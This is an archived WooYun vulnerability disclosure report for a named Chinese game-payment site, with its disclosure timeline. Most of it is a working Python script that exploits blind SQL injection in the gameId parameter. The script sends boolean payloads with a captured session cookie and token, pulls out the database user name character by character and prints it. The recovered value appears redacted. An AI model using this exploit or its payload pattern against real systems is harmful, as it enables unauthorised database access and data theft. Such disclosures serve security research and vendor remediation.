乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-26: 细节已通知厂商并且等待厂商处理中 2015-12-26: 厂商已经确认,细节仅向厂商公开 2016-01-05: 细节向核心白帽子及相关领域专家公开 2016-01-15: 细节向普通白帽子公开 2016-01-25: 细节向实习白帽子公开 2016-02-08: 细节向公众公开
~~~
#!/usr/bin/env python#-*-coding:utf-8-*-'''url='http://www.ibidian.com/pay/pay/get_server_list'postgameId=165 and length(user())=26&cache=1451107818cookie='login_start=1; user_id=cO5txlA6%2FB1rAAq7YXVGXg%3D%3D; user_name=wooyun; nickname=wooyun; user_icon=http%3A%2F%2Fimg.funshion.com%2Fimg%2Fdefault%2Fhead_s_m.jpg; ads_id=1; page_id=1; cookie_timeout=0; token=JM0lbOGuGr9b7rifs51kqqOY9TJ2br_z_mG-glStU_eDUdX4YBAM7xoSFrYQoGsOcLK4Coke14FATjDcImGVazVEJJP9bceszW5Rltw4NK8; encrypted=cO5txlA6%2FB1rAAq7YXVGXg%3D%3D''''import requestsurl='http://www.ibidian.com/pay/pay/get_server_list'cookie='login_start=1; user_id=cO5txlA6%2FB1rAAq7YXVGXg%3D%3D; user_name=wooyun; nickname=wooyun; user_icon=http%3A%2F%2Fimg.funshion.com%2Fimg%2Fdefault%2Fhead_s_m.jpg; ads_id=1; page_id=1; cookie_timeout=0; token=JM0lbOGuGr9b7rifs51kqqOY9TJ2br_z_mG-glStU_eDUdX4YBAM7xoSFrYQoGsOcLK4Coke14FATjDcImGVazVEJJP9bceszW5Rltw4NK8; encrypted=cO5txlA6%2FB1rAAq7YXVGXg%3D%3D'referer='http://www.ibidian.com/pay/pay/index'user_agent='Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'payloads='abcdefghijklmnopqrstuvwxyz._@ 0123456789'user=''headers={'Cookie':cookie,'Referer':referer,'User-Agent':user_agent}for i in range(1,27): for p in payloads: gameid='165 and if(ascii(substr(user(),{},1))={},1,0)'.format(i,ord(p)) data={'gameId':gameid,'cache':'1451107818'} req=requests.post(url,data=data,headers=headers) if len(req.text)>1000: user=user+p print '\n[User]: '+user+'\n' break print gameidprint '[FINISH]: '+user
user= [email protected]
intval
危害等级:中
漏洞Rank:10
确认时间:2015-12-26 18:58
感谢您对风行安全的观注
暂无